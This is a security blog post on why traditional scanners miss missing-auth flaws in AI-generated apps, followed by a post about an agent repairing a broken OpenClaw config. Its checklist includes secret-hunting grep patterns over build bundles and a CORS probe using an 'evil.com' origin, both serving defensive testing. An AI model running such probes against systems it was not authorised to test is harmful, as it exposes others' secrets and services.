Scanning Vibe-Coded Apps: Why Traditional SAST/DAST Falls Short (part 6)

Vibe Coding Security Series

  1. What Is Vibe Coding Security? A Field Guide for 2026
  2. The OWASP Top 10 for Vibe-Coded Applications
  3. Anatomy of a Vibe Coding Breach: Lessons from 2026’s Worst Incidents
  4. The Dependency Trap: Supply Chain Risks in AI-Generated Code
  5. Authentication & Secrets: What AI Gets Wrong Every Time
  6. Scanning Vibe-Coded Apps: Why Traditional SAST/DAST Falls Short (you are here)
  7. Prompt Engineering for Secure Code
  8. The Founder’s Security Checklist (coming soon)
  9. Securing the AI Coding Pipeline (coming soon)
  10. The Future of Vibe Coding Security (coming soon)

Read Time: 20 minutes

TL;DR

Traditional security scanners pattern-match on code that exists. The most dangerous vulnerabilities in vibe-coded apps live in code that doesn’t exist — missing auth checks, missing rate limiting, missing authorization logic. A January 2026 SAST benchmark found tools flagging 68–75% of safe code as vulnerable while architectural flaws passed silently, and Georgia Tech has tracked 74 AI-attributed CVEs with monthly discoveries growing 6x in two months. New AI-native tools are closing the gap, but as of mid-2026, broken authorization and absent security controls still require human review. This post covers what works, what doesn’t, and how to build a scanning pipeline for AI-generated code.


The Scanning Paradox

We have more security scanning tools than at any point in the history of software development. SAST, DAST, SCA, IAST, RASP — the acronym count alone suggests the problem should be solved. And for human-written code, these tools have been steadily improving for two decades. The issue is that vibe-coded applications don’t fail the way human-written ones do.

When a human developer introduces a SQL injection, it’s usually because they forgot to parameterize a query. A SAST tool pattern-matches on string concatenation inside a SQL call and flags it. Straightforward. When an AI coding tool introduces a security flaw, the code is typically syntactically clean, follows documented API patterns, and passes every functional test. The vulnerability isn’t in how the code is written — it’s in what the code doesn’t do. Missing server-side validation. Missing rate limiting. Missing authorization checks. Missing RLS policies. You can’t pattern-match on absent code.

Georgia Tech’s Vibe Security Radar, launched in May 2025, tracks CVEs attributable to AI coding tools by tracing fixing commits backward through Git history. Their numbers tell the story: 6 AI-attributed CVEs in January 2026, 15 in February, 35 in March. A nearly 6x increase in two months. The total confirmed count stands at 74, with researchers estimating the true number is 5–10x higher because most AI-generated code doesn’t leave clear attribution markers.

Meanwhile, the Cloud Security Alliance’s emergency strategy briefing — assembled over a single weekend by 60+ contributors including Jen Easterly and Bruce Schneier — warned that the window to fix vulnerabilities is collapsing: mean time from disclosure to confirmed exploitation has fallen to less than one day in 2026, down from 2.3 years in 2019. Separate CSA research has found that 62% of AI-generated code samples contained vulnerabilities.

The scanners are running, the vulnerabilities are still shipping, and the gap is widening.


What SAST Actually Catches (And What It Doesn’t)

Static Application Security Testing works by analyzing source code without executing it. Tools like CodeQL, Semgrep, SonarQube, and Checkmarx parse the code into an abstract syntax tree, then match patterns against known vulnerability signatures — string concatenation in SQL queries, eval() on untrusted input, deprecated cryptographic functions. These are well-defined patterns, and SAST handles them reliably.

The problem is false positives and structural blind spots.

The False Positive Problem

A January 2026 study benchmarked CodeQL, Semgrep, SonarQube, and Joern against OWASP Benchmark v1.2 — 2,740 Java test cases with known vulnerability status. CodeQL achieved the highest F1-score at 74.4%, but it flagged 68.2% of non-vulnerable test cases as positive — 904 false positives across the benchmark. SonarQube produced 1,254 false positives, covering 45.8% of all test cases. Semgrep flagged 74.8% of non-vulnerable cases. Joern had the fewest false positives at 96 but achieved only 8.2% recall — it catches almost nothing.

For a vibe coder running Semgrep on their AI-generated codebase for the first time, this means roughly three-quarters of the alerts they see are noise. After the third false positive about a “potential injection” in code that’s actually safe, most people stop reading the output entirely. The signal drowns in the noise, and the real issues — the ones that matter — scroll past unread.

Here’s one I run into constantly. Over the past few years I’ve done plenty of code reviews for AWS-based applications at VULNEX, and Semgrep flags AWS account IDs as sensitive information leaks in nearly every project. The problem is that AWS themselves don’t consider account IDs to be sensitive — their documentation explicitly states they can be shared when needed. That’s a false positive that shows up in every single AWS project, training teams to ignore Semgrep output for that codebase entirely. I always work with the customer to understand their specific privacy requirements before dismissing or escalating any finding — some organizations do treat account IDs as internal-only regardless of what AWS says — but this is exactly the kind of noise that erodes trust in automated tools.

The Structural Blind Spot

False positives are annoying but manageable. The structural blind spot is the real problem. SAST works by matching patterns in code that exists. Vibe-coded vulnerabilities are often in code that doesn’t exist.

Consider the QuickNote app from Part 5. The most dangerous issues weren’t bugs in the code — they were missing features. No rate limiting on the login endpoint. No RLS policies on the database. No server-side authorization check. No token expiration. SAST cannot flag the absence of a security control, because there’s no code to analyze. It’s like asking a spell-checker to tell you that your essay is missing a conclusion.

Here’s what happens when you run Semgrep against a typical vibe-coded Express.js app:

semgrep --config=auto ./src

Semgrep will likely flag things like innerHTML usage (real issue — XSS), eval() calls if present, and maybe the MD5 hash function. What it won’t flag: the /api/users/:id/notes endpoint lacking an ownership check, jwt.sign() called without an expiresIn parameter, the entire application having no rate limiting middleware, Supabase RLS disabled on every table.

These are the vulnerability classes that matter most in vibe-coded applications, and SAST is structurally incapable of detecting them.

What SAST Is Good For

This isn’t an argument to stop using SAST. Pattern-matching catches real issues: hardcoded credentials (when they match known patterns), dangerous function calls, known-vulnerable library usage, obvious injection vectors. For the subset of vulnerabilities that look like traditional bugs, SAST works. The problem is that in vibe-coded apps, that subset covers maybe 30% of the actual risk surface. The other 70% is architectural.


What DAST Misses in the SPA Era

Dynamic Application Security Testing takes the opposite approach — instead of reading source code, it runs the application and attacks it from outside. OWASP ZAP and Burp Suite send malicious payloads to endpoints, monitor responses, and flag behavior that indicates vulnerabilities. If you can trigger a SQL injection through an HTTP request, DAST finds it. If a reflected XSS payload shows up in the response, DAST catches it.

For traditional server-rendered web applications, DAST has been reasonably effective. But vibe-coded applications are overwhelmingly single-page apps (SPAs) built with React, Next.js, or Vue, and DAST’s architecture has a hard time with them.

The Crawling Problem

DAST discovers application functionality by crawling — following links, submitting forms, parsing HTML. SPAs don’t work that way. Routes are handled client-side by JavaScript. Forms are React components that communicate via fetch() calls. API endpoints aren’t discoverable by parsing HTML, because the HTML is a nearly empty shell that loads a JavaScript bundle. A DAST crawler hitting a typical vibe-coded React app sees <div id="root"></div> and maybe a few <script> tags. It misses everything.

Modern DAST tools have gotten better at JavaScript rendering — ZAP has an AJAX Spider, Burp has a built-in browser. But they still struggle with authentication flows (especially OAuth), multi-step workflows, and application state. A login form that uses useState for input tracking and useEffect for token storage doesn’t behave like a traditional HTML form, and DAST crawlers frequently can’t complete the auth flow to reach the protected surface area behind it.

The Business Logic Gap

Even when DAST can reach the endpoints, it hits the same wall SAST does: the vulnerability is in what the code doesn’t do. DAST sends a SQL injection payload to /api/notes and checks whether the response looks like database output. That’s a legitimate test. But it doesn’t test whether /api/notes/42 returns data belonging to a different user. It doesn’t test whether the /api/admin/users endpoint is accessible with a non-admin token. It doesn’t test whether the login endpoint allows 10,000 attempts per minute.

These are business logic vulnerabilities — they require understanding the application’s intended behavior, not just its input/output surface. DAST treats the application as a black box. For vibe-coded apps where the most dangerous vulnerabilities are in the authorization model, that black-box approach misses the things that matter.

Where DAST Still Helps

DAST catches configuration issues that SAST can’t: missing security headers, permissive CORS policies, exposed server information, SSL/TLS misconfigurations. These are deployment-level problems, not code-level problems, and vibe-coded apps tend to ship with terrible default configurations because the AI optimizes for “it works locally.” Running ZAP or Nuclei against your deployed application catches the infrastructure-layer gaps.

Nuclei deserves a specific mention. Its community-maintained template library now exceeds 11,000 templates, and ProjectDiscovery has introduced AI-powered template generation — describe a check in natural language, get a YAML template. A recent pull request added AI Security DAST templates specifically targeting AI-system patterns. It’s not solving the fundamental architectural problem, but it’s the closest DAST has gotten to being vibe-code-aware.


The SCA Gap: When Dependencies Don’t Exist

Software Composition Analysis (SCA) tools — Snyk, npm audit, Dependabot, Socket.dev — check your project’s dependencies against vulnerability databases. If you’re using lodash@4.17.20 and there’s a CVE for that version, SCA flags it. This has been one of the most effective automated security practices for the past decade.

AI-generated code breaks SCA because the dependencies are made up.

Slopsquatting

The term, coined by security researcher Seth Larson, describes what happens when AI coding tools recommend packages that don’t exist in any registry. A March 2025 study analyzing 576,000 AI-generated code samples found that roughly 20% recommended packages that aren’t real. Worse, 43% of those hallucinated package names are consistent across different AI runs — meaning an attacker can predict which fake names the AI will suggest, register them, and fill them with malicious code.

That’s exactly what happened. In January 2026, a hallucinated npm package called react-codeshift spread through 237 repositories via AI-generated code. Nobody deliberately planted the package name in the AI’s training data. The AI hallucinated it, multiple developers installed it when their AI suggested it, and eventually someone registered it with malicious code. The supply chain attack was automated by the AI itself.

SCA tools can’t flag a package that doesn’t have a CVE because it’s brand new and doesn’t appear in any vulnerability database yet. npm audit would report zero issues for react-codeshift — the package existed, it had no known CVEs, and its package.json looked normal. The malicious behavior was in the code, not in the metadata.

What Different SCA Tools Catch

The SCA landscape has split into two camps. Traditional CVE-based tools (npm audit, Dependabot, basic Snyk scanning) check packages against known vulnerability databases. If the vulnerability has a CVE, they catch it. If it doesn’t, they don’t. For established packages with active security research, this works. For hallucinated packages, newly registered packages, and packages with obfuscated malicious behavior, it’s blind.

Socket.dev represents the newer approach — it analyzes package behavior rather than just checking CVE databases. It detects install scripts that exfiltrate environment variables, network calls to unexpected domains, obfuscated code that decodes at runtime, and sudden changes in maintainer behavior. This behavioral analysis catches supply chain attacks that CVE databases haven’t catalogued yet.

Snyk’s DeepCode AI combines symbolic analysis with AI to scan code snippets as they’re generated, catching vulnerable patterns inside the IDE before they reach the repository. This is closer to where SCA needs to go for vibe-coded apps — flagging issues at generation time rather than after the package is installed and the code is committed.

For the dependency problems I covered in Part 4, no single SCA tool covers the full risk surface. The practical answer is layering: npm audit for known CVEs, Socket.dev for behavioral anomalies, and manual verification that the packages your AI suggested actually exist and are what they claim to be.


What’s Actually Working: The New Wave

The gap between what traditional tools catch and what vibe-coded apps need has spawned a new generation of security tools. Some are AI-native — they use LLMs to reason about code instead of pattern-matching. Others take hybrid approaches, combining traditional analysis with AI-powered reasoning. A few are specifically designed for vibe-coded applications.

LLM-Augmented SAST

The most promising near-term improvement is using LLMs to post-process traditional SAST output. The same January 2026 study that exposed SAST’s false positive rates also tested layering LLM agents on top of the output. The best configuration reduced the initial false positive rate from 98.3% to 6.3%. The LLM reads the flagged code in context, understands what it’s doing, and determines whether the flag is legitimate or noise.

This doesn’t solve the blind spot problem — the LLM is still working from SAST’s initial findings, so absent code remains invisible. But it makes SAST output actually usable. Instead of 750 alerts where 700 are false positives, you get 50 alerts where 47 are real. That’s the difference between a report nobody reads and a report that drives fixes.

Neuro-Symbolic Analysis (IRIS)

IRIS, published at ICLR 2025, takes a different approach. Instead of post-filtering SAST output, it combines LLM reasoning with CodeQL’s static analysis in a neuro-symbolic framework. The LLM identifies potential vulnerability patterns through code comprehension, then CodeQL validates them with formal analysis. Using GPT-4, IRIS detected 55 vulnerabilities across 30 Java projects — 103.7% more than CodeQL alone. It found 4 previously unknown vulnerabilities. Even a smaller model (DeepSeekCoder 7B) detected 52 vulnerabilities, showing this approach doesn’t require cutting-edge models.

The false discovery rate is still high at 84.82%, but it’s 5.21% lower than CodeQL by itself. More importantly, IRIS catches vulnerability categories that pure pattern-matching misses — it can reason about whether an authorization check is semantically correct, not just whether one exists.

AI-Native Scanners

Two major AI-native security scanners launched in early 2026. Anthropic’s Claude Code Security, released February 2026, uses LLM reasoning to analyze code for vulnerabilities rather than matching patterns. It’s available to Enterprise and Team customers, and free for open-source maintainers. In its initial period, it found over 500 high-severity vulnerabilities in open-source projects. OpenAI’s Codex Security, launched March 2026, scanned over 1.2 million commits during beta, surfacing 792 critical and 10,561 high-severity findings.

Neither tool has been independently audited, so take the numbers with appropriate caution. But the approach is fundamentally different from traditional SAST — instead of matching patterns, these tools read code the way a security reviewer would, reasoning about data flow, trust boundaries, and whether the security model makes architectural sense.

Pre-Publish Security Gates

VibeGuard, published April 2026, targets the specific blind spots of AI-generated code with a pre-publish security gate framework. It checks for five categories: artifact hygiene (source maps, debug files shipping to production), packaging-configuration drift, hardcoded secrets, supply-chain risks, and source-map exposure. The motivation came from a real incident — in March 2026, Anthropic’s own Claude Code CLI shipped a 59.8 MB source map exposing roughly 512,000 lines of TypeScript source. In controlled experiments on 8 synthetic projects, VibeGuard achieved 100% recall and 89.47% precision (F1 = 94.44%).

This is a narrower tool than a full SAST scanner, but it targets exactly the things vibe-coded apps get wrong. AI coding tools are very good at generating code that works. They’re terrible at generating deployment artifacts that are clean and hardened. VibeGuard sits in the gap.

Agentic Security Platforms

DryRun Security calls itself “AI-native, agentic” code security. Rather than pattern-matching individual files, it inspects data flow across files and services — understanding how data moves through the application at an architectural level. Their 2025 SAST Accuracy Report showed 88% detection of seeded vulnerabilities out of the box, outperforming four leading traditional static analyzers, with particular strength on complex logic and authorization flaws. In February 2026, they launched a DeepScan Agent that does full-repository security reviews.

Escape raised $18 million in March 2026 specifically to replace legacy scanners with AI agent-driven security testing. Their research team’s methodology is worth studying: they scanned 5,600 publicly accessible vibe-coded applications and found over 2,000 high-impact vulnerabilities. The breakdown is telling — 400+ exposed secrets and 175 instances of personal data exposure, including medical records and bank account numbers. Zero-auth APIs, missing rate limiting, and BOLA/IDOR dominated the findings. These are exactly the vulnerability classes that traditional scanners miss.


What Scanners Miss: The Vibe Code Blind Spots

Across the research, six vulnerability patterns in AI-generated code consistently evade traditional scanning tools. Knowing them means you know what to look for manually, even when the scanner gives you a clean report.

1. Frontend-Only Security Controls

The AI generates a React auth guard that checks localStorage for a JWT before rendering protected routes. The guard works — unauthenticated users see the login page. But the API behind those routes accepts any request, with or without a token. SAST scanning the backend sees API endpoints that take requests and return data. It doesn’t cross-reference with the frontend to check whether server-side enforcement exists. DAST might not reach the endpoints at all if it can’t complete the frontend auth flow.

2. Zero-Auth APIs

Escape’s scan of 5,600 vibe-coded apps found applications with 7–12 public API endpoints performing destructive operations (DELETE, PUT) with no authentication at all. The OpenAPI spec — when one existed — had no security schemes defined. SAST doesn’t flag an endpoint for not having auth middleware, because “no middleware” isn’t a pattern it can match. The code is perfectly valid; it’s just missing a security requirement.

3. Missing Rate Limiting

As I showed in Part 5, a login endpoint without rate limiting lets an attacker try the top 1,000 passwords in ten seconds. No scanner flags this because rate limiting is a middleware addition, not a code pattern. The login endpoint itself is correct — it validates credentials and returns a token. The absence of express-rate-limit or its equivalent is a deployment decision, not a code bug.

4. BOLA/IDOR Without Sequential IDs

The Lovable BOLA breach from Part 5 is the canonical example. The API checked authentication (valid Firebase token) but not authorization (does this token’s user own this project?). SAST sees the firebase.auth() call and considers the endpoint protected. The ownership check that should follow is business logic the scanner can’t infer. DAST could theoretically detect IDOR by testing two different user sessions, but most DAST configurations don’t set up multi-user testing scenarios.

5. Insecure Default Configurations

AI-generated code uses Supabase with RLS disabled, Firebase with security rules set to allow read, write: if true, Express with no CORS configuration (defaulting to allow-all), and JWT libraries with the algorithms parameter unset (allowing the none attack). None of these are bugs. They’re all valid configurations that happen to be insecure. SAST would need configuration-specific rules to flag them — and most tools don’t ship with rules for “Supabase table missing RLS policy.”

6. Artifact Hygiene Failures

Source maps shipped in production, .env files baked into Docker images, node_modules included in deployable artifacts, debug logging active in production. These aren’t code vulnerabilities — they’re packaging and deployment failures that expose source code, secrets, and internal architecture. Traditional SAST and DAST don’t scan build artifacts at all.


Building a Scanning Pipeline That Works

No single tool covers the full risk surface of a vibe-coded application. The practical answer is layering tools where each one covers a different gap, running them in the right order, and knowing what still requires human review.

Layer 1: Pre-Commit (Catch Secrets Before They Ship)

Before code reaches the repository, run secret detection. This is the highest-ROI automated check because secrets in version control are permanent — even if you delete the file, the secret lives in Git history.

# Install and run Gitleaks as a pre-commit hook
gitleaks detect --source . --verbose

# Or TruffleHog for deeper analysis including Git history
trufflehog filesystem . --only-verified

Configure this as a Git pre-commit hook. Every commit gets scanned. If a secret is detected, the commit is blocked. This is the one layer where automation is genuinely reliable — the patterns are well-defined and false positives are manageable.

Layer 2: CI Pipeline (SAST + SCA on Every Push)

Run SAST and SCA in your CI pipeline. The goal here isn’t perfection — it’s catching the 30% of issues that pattern-matching handles well.

# Semgrep with auto-config (pulls relevant rule sets for your stack)
semgrep --config=auto --error --json ./src > semgrep-results.json

# npm audit for known dependency CVEs
npm audit --audit-level=high

# Socket.dev CLI for behavioral dependency analysis
socket scan create --repo . --branch main

The critical step is filtering SAST output. If your team is drowning in false positives, start with only the high-confidence rules. Semgrep’s p/security-audit ruleset is more targeted than --config=auto. For SCA, differentiate between development and production dependencies — a CVE in a dev-only testing library is lower priority than one in your authentication middleware.

Layer 3: Post-Deploy (DAST Against the Running App)

After deployment, run DAST against your actual application. This catches configuration issues that don’t exist in source code.

# Nuclei with community templates
nuclei -u https://yourapp.com -t nuclei-templates/ -severity critical,high

# ZAP baseline scan
docker run -t zaproxy/zap-stable zap-baseline.py -t https://yourapp.com -r report.html

For SPAs, use ZAP’s AJAX Spider or Burp’s browser-based crawling rather than the default HTTP crawler. Feed the scanner your OpenAPI spec if you have one — it’ll discover endpoints the crawler misses.

Layer 4: AI-Augmented Review (The New Layer)

This is the emerging layer that didn’t exist a year ago. If you have access to Claude Code Security, Codex Security, or DryRun, run them as a complement to traditional SAST. They cover the architectural reasoning gap — detecting absent controls, evaluating whether authorization logic is semantically correct, and understanding data flow across service boundaries.

If you don’t have access to these commercial tools, you can approximate the approach by running an LLM against your SAST output to filter false positives (the technique from the January 2026 study reduced false positives from 98.3% to 6.3%), or by prompting an LLM to review specific security-critical files with targeted questions: “Does this endpoint verify that the authenticated user owns the requested resource?” “Is there a rate-limiting middleware applied to this route?”

Layer 5: Manual Review (The Irreplaceable Layer)

I’ve been in application security for over two decades. Every engagement I do at VULNEX starts with automated scanning and ends with manual review, because the automated tools always miss something. For vibe-coded apps, the manual review is even more important because the vulnerability classes are architectural.

The manual review checklist is shorter than people think. For each API endpoint: does it check authentication? Does it check authorization — not just “is this user logged in” but “is this user allowed to access this specific resource”? Is the client sending any data that controls server-side behavior (user IDs, role flags, price overrides) without server-side validation? Are there admin functions accessible to regular users?

A focused manual review of the auth and authorization layer takes hours, not days, and it catches the issues that every automated tool misses.

What This Costs

For a solo founder or small team, here’s roughly what this takes. Layers 1–3 use free, open-source tools — Gitleaks, Semgrep, npm audit, Socket.dev’s free tier, Nuclei. Setting up the full CI pipeline takes an afternoon if you’re comfortable with GitHub Actions or similar, a weekend if you’re starting from scratch. Layer 4 varies: Claude Code Security is free for open-source projects, DryRun and Escape have commercial pricing that typically starts in the low hundreds per month. Layer 5 is where it gets expensive if you don’t have security expertise in-house. A focused auth and authorization review from a security consultancy typically runs €3,000–€10,000 depending on application size and complexity. That’s real money for an early-stage startup — but skipping it is how the breaches from Part 3 happened.


The Scanning Checklist

Run this against your vibe-coded application. Each item addresses a specific gap in traditional scanning.

Secrets (Pre-Commit):

  1. Run gitleaks detect --source . --verbose and trufflehog filesystem . --only-verified — zero findings before any commit
  2. Search frontend bundles for leaked keys: grep -r "sk-\|API_KEY\|SECRET\|Bearer\|supabase\|firebase" dist/ build/
  3. Verify .env files were never committed: git log --all --diff-filter=A -- '*.env' '.env*'

SAST (CI Pipeline):

  1. Run semgrep --config=p/security-audit --error ./src — use the focused ruleset, not --config=auto, to keep noise manageable
  2. Review every high or critical finding manually — look for innerHTML, eval(), dangerouslySetInnerHTML, unsanitized SQL

SCA (CI Pipeline):

  1. Run npm audit --audit-level=high — address all high and critical CVEs
  2. Verify dependencies are real: check that every package in package.json has a legitimate npmjs.com page with downloads and a real maintainer
  3. Run Socket.dev or Snyk for behavioral analysis — catches supply chain attacks that CVE databases miss

DAST (Post-Deploy):

  1. Run nuclei -u https://yourapp.com -severity critical,high against your deployed app
  2. Check security headers and CORS: curl -s -D- https://yourapp.com | grep -i "x-frame\|x-content-type\|strict-transport\|content-security-policy" and test with Origin: https://evil.com

Manual (The Gaps):

  1. Test every API endpoint without the frontend — does it require authentication?
  2. Test cross-user access — can User A access User B’s resources by changing IDs?
  3. Test admin endpoints with a regular user’s token, send 100 rapid login requests to verify rate limiting (expect a 429), and confirm Supabase RLS / Firebase security rules are enabled and scoped to the authenticated user

This pipeline won’t catch everything. But it covers the layers where automated tools are reliable, flags the areas where they’re blind, and directs manual effort to where it matters most. If you’re running zero scanning today — which, based on what I see in assessments, describes most vibe-coded applications — starting with items 1, 2, 11, and 12 gives you the most security value for the least effort.


What You Should Take From This

Traditional security scanners aren’t broken. They’re solving a different problem. They were built for a world where developers understand their code and make localized mistakes — a forgotten parameterized query, a misused crypto function, an outdated dependency. AI-generated code introduces a new class of vulnerability: architecturally correct code with absent security controls. The login works, the JWT validates, the database responds — and the fact that any authenticated user can read any other user’s data isn’t something a pattern-matcher can flag.

The scanning landscape is evolving fast. AI-native tools that reason about code rather than pattern-matching against it are starting to close the gap. The IRIS approach (neuro-symbolic analysis), LLM-based false-positive filtering, and pre-publish gates like VibeGuard are all steps in the right direction. But as of mid-2026, no automated tool reliably catches broken authorization logic, missing rate limiting, or client-side-only security controls. Those still require human review.

My workflow at VULNEX: Gitleaks and TruffleHog for secrets, Semgrep for pattern-based issues, npm audit plus Socket.dev for dependencies, Nuclei for the deployed surface, and then manual testing of every auth and authorization boundary. The automated layers take minutes, the manual review takes hours — and in my experience, the manual review is where the critical vulnerabilities surface.

If you’re a solo founder or non-security engineer — which describes most people building with AI coding tools — Layer 5 is the hard one. You can’t review what you don’t know how to find. My practical advice: run Layers 1–3 at minimum, they’re free and they catch real issues. If your application handles user data, payments, or anything sensitive, budget for a professional security review before you launch. It doesn’t have to be a full pentest — a focused review of your auth and authorization boundaries, scoped to 2–3 days, catches the architectural issues that automation misses. Part 8 of this series will go deeper on this with a complete founder’s checklist.

As always: trust nothing, verify everything.


Further Reading


References

Posted in AI, Pentest, Security, Technology | Tagged , , , , | Leave a comment

When Agents Fix Agents: How Hermes Patched OpenClaw After a Bad Update

Read Time: 7 minutes

TL;DR

I told OpenClaw to update itself. It did. Then the gateway refused to start because a config field had quietly changed shape between releases (channels.discord.streaming went from string to object). openclaw doctor --fix saw the problem but couldn’t fix it. The Google AI Overview confidently suggested the opposite of the correct fix. Hermes-Agent, with shell and filesystem access, read the failing config, made the right one-line change, backed up the original, restarted the service, and verified — all from a one-paragraph prompt. Thirteen minutes from red banner to green. This is what “agentic ops” actually looks like.


I have been running OpenClaw on a Raspberry Pi 5 for a while now. It is the kind of setup you tune on weekends and forget about during the week — until an update lands and something quietly breaks.

This morning was one of those mornings. What I want to write down is not just the bug, but the shape of the fix. OpenClaw’s own repair tool did not get the gateway back up. Neither did the AI Overview at the top of every Google result. What worked was a general-purpose agent with shell and file access, and the habit of reading a config before having an opinion about it.

That distinction sounds small. It is not.


Step 1: I Asked AgentX to Update Itself

The whole story starts with a perfectly reasonable instruction. I opened the OpenClaw chat UI, said hi to AgentX (my main OpenClaw agent), and asked it to update.

1

update yourself please. The kind of thing you say to an autonomous agent and assume it will handle.

It did handle the update part. It just did not handle the post-update validation part, because that is not yet a thing OpenClaw does by itself. The new release introduced a schema change to one of the config fields. The update wrote the new binaries. The config file kept its old shape. The next gateway start would fail.

I did not know any of this yet.


Step 2: Half an Hour Later, the Gateway Refuses to Start

Same session, same morning. The update completed quietly in the background. When I went to bring the gateway up — openclaw gateway, expecting a normal boot — I got this instead:

2

Invalid config at /home/vulnex/.openclaw/openclaw.json:
channels.discord.streaming: invalid config: must be object
Run "openclaw doctor --fix" to repair, then retry.

Helpful, in theory. The startup writes a stability bundle (good — that is what stability bundles are for) and the service dies on its way back down.


Step 3: Status Check Confirms the Broken State

I ran openclaw gateway status to get the full picture.

3

Red line across the board. state failed, sub failed, last exit 1, reason 1. The dashboard URL was sitting there mocking me, the loopback probe couldn’t connect, and the gateway was clearly not coming back without intervention.

This is the moment where, in a normal world, you would walk through OpenClaw’s suggested fix and be done in five minutes. So that is what I tried first.


Step 4: doctor --fix — The Self-Repair That Wasn’t (Part 1)

openclaw doctor --fix is meant to be the “have you tried turning it off and on again” button. So I tried it.

4

The doctor was happy to lecture me about NODE_COMPILE_CACHE and OPENCLAW_NO_RESPAWN on low-power hosts. Useful tips. Not the problem.


Step 5: doctor --fix — The Self-Repair That Wasn’t (Part 2)

The doctor walked through the config and gateway sections and ended where I started:

5

Restarted systemd service: openclaw-gateway.service
Error: Config validation failed: channels.discord.streaming: invalid config: must be object

The doctor restarted the service but never actually touched the offending key. Which makes sense, in hindsight. The validator says “must be object,” but the doctor has no opinion on what that object should look like. It is not in the business of guessing new schemas. Fair enough. Not very useful at 10:27 in the morning.

One thing OpenClaw should change: doctor --fix should not print “Restarted systemd service” one line above “Error: Config validation failed” and exit happy. It tripped me up, and it will trip other people up. I will file the bug.


Step 6: The Wrong Answer From the AI Overview

At this point I did what most people would do: I pasted the exact error string into Google to see if anyone else had hit this between versions.

6

It told me the validator wants a string like "partial", and that my config has an object — when in reality the new OpenClaw expects an object and my old config has a string. It even produced a tidy, syntax-highlighted JSON block I could have copy-pasted straight into the config to break it harder, and tagged the answer with a confidence-inspiring GitHub citation pill.

If I had been in a hurry, I would have pasted it. That is the part most “AI for ops” demos quietly skip. The answer was fluent, well-formatted, even cited — and 180° wrong about the direction the schema had migrated.

It is the same threat model I covered in Professional Vibe Coding vs. Vibe Coding, just dropped into an ops context instead of a coding one. If your AI cannot read the validator and the config, you are going to get a confident answer that was synthesised from the error string, and sometimes that answer is the opposite of correct.


Step 7: Calling In Hermes

I keep Hermes-Agent attached to this box for exactly this kind of mess. It has filesystem tools, shell execution, and the patience to read things instead of guessing.

7

The skill set matters here: file:patch, read_file, search_files, write_file, code_execution, plus the openclaw-agent-integrations skill I keep around for exactly this plumbing. Nothing glamorous, just the basic moves you need to repair a misconfigured service.

I gave it a one-paragraph brief:

“I told openclaw to update itself and did, however the latest version breaks due a openclaw config json file error. The folder path is /home/vulnex/.openclaw. Make a copy of the config json file and fix the issue. You can use openclaw command to see the issue.”

That is it. No schema, no hints, no example of the new format.


Step 8: Hermes Orients Itself

Hermes did what I would have done if I had another hour.

8

  • Inspected the environment
  • Found a way to invoke openclaw (the binary is on my PATH, but Hermes’ non-interactive shell did not inherit it, so it fell back to npx --yes openclaw and flagged that in its summary)
  • Read the failing config
  • Pulled the stability bundle that the gateway had dropped on its way out the door

Not a single dramatic LLM call. A stack of small, verifiable steps — find, command -v, head, npm prefix -g, a one-shot python3 heredoc that searches $PATH for anything named claw. Boring on purpose.


Step 9: Hermes Diagnoses

Once it had the config and the failure bundle in context, Hermes compared them and figured out exactly what had changed between releases.

9

No guessing from the error string. Reading the source.


Step 10: The Fix Lands

Hermes had none of the trouble the AI Overview did, because Hermes was reading the actual files instead of inferring from prose.

10

The diff is the whole story:

// before — old shape, valid in 2026.5.18 and earlier
"channels": {
  "discord": {
    "streaming": "off"
  }
}

// after — new shape, required by 2026.5.19
"channels": {
  "discord": {
    "streaming": { "mode": "off" }
  }
}

OpenClaw 2026.5.19 promoted channels.discord.streaming from a string to a tagged object. The doctor saw it was wrong but had no opinion on the new shape. The Google AI Overview had an opinion and it was the opposite of correct. Hermes:

  1. Read the failing config and the gateway’s startup_failed.json stability bundle
  2. Made the smallest possible change
  3. Wrote ~/.openclaw/openclaw.json.agenth-bak-20260521-103255 next to the original
  4. Restarted the gateway service
  5. Verified that the JSON parses cleanly and the previous error is gone

It also called out its own caveats honestly:

  • It used npx --yes openclaw because its non-interactive shell didn’t inherit my interactive PATH — even though the openclaw binary is, in fact, installed globally on this host. A small mis-read of the environment, but a transparent one.
  • openclaw doctor still reported unrelated warnings — but the config-breaking startup issue was fixed

That self-reporting matters, even when (as with the PATH case) the agent is slightly too pessimistic about its environment. An agent that flags its assumptions is much easier to trust than one that hides them.


Step 11: Verification From the Shell

Trust, but verify. Back to the original command that started this whole thing.

11

Runtime: running (pid 10178, state active, sub running, last exit 0, reason 0)
Connectivity probe: ok

Same command, opposite outcome. Eleven minutes earlier this had been a wall of red.


Step 12: Asking AgentX to Confirm

Then I went back to the OpenClaw chat UI — the same place where the whole story started — and asked AgentX directly. Because if you cannot trust the agent to self-report after a recovery, you have other problems.

12

“All good — gateway is running on 2026.5.19, active since 10:33. The doctor --fix restart attempt errored but the service came up fine on its own. We’re fully updated and online.”

Thirteen minutes from the first red banner to a green status. Most of that was me reading.

The chat session bookends the whole story. It opens with “update yourself please” and closes with “fully updated and online.” In between, a completely different agent had to come in and do the actual work. That gap is what this post is about.


What This Episode Actually Tells Us

The tidy version of the story is “agent breaks itself, agent fixes itself.” The interesting part is the middle.

The vendor’s own repair tool did not fix the vendor’s own product

openclaw doctor --fix is a good idea, poorly committed to. It should either understand the schema migration paths between recent releases, or stop pretending it has done a repair when the next line of its own output says the config still fails to validate. Right now it does the worst possible thing: it claims success and leaves you broken. That is an OpenClaw bug, not an AI bug, and I will file it.

Consumer AI Overviews are confidently wrong on schema questions

This is not a one-off. The AI Overview cannot read your config, cannot read the validator source, cannot tell which way a schema migrated between two versions, and formats the wrong answer with the same confidence as the right one.

For someone just trying to get the gateway back up before a meeting, that answer is worse than no answer at all. No answer sends you to the docs. A confident wrong answer sends you to paste broken JSON into a working file.

It is not a Google-specific problem either. It is the general pattern of producing a fluent answer from the symptom rather than the source. Any AI deployed without read access into the actual artifact will hit the same wall.

The agent that worked was not magic

Hermes did not solve this because it is bigger, smarter, or trained on something exotic. It solved it because it could read the file, run a command, write the file, and keep a backup. Those four moves are the floor for what I would call agentic ops, and most consumer AI is still well below the floor.

The rule I take away from the morning is short: if the AI you are about to trust with a config can’t read the file and can’t keep a backup, it is not an ops tool. It is a search engine with better grammar.


What I Would Change About My Setup After This

A few things I am going to wire up this weekend.

I want ~/.openclaw/openclaw.json snapshotted to a local git repo before every openclaw update. Hermes’ .agenth-bak files are fine for one incident, but a real version-controlled history is better when the next schema change lands.

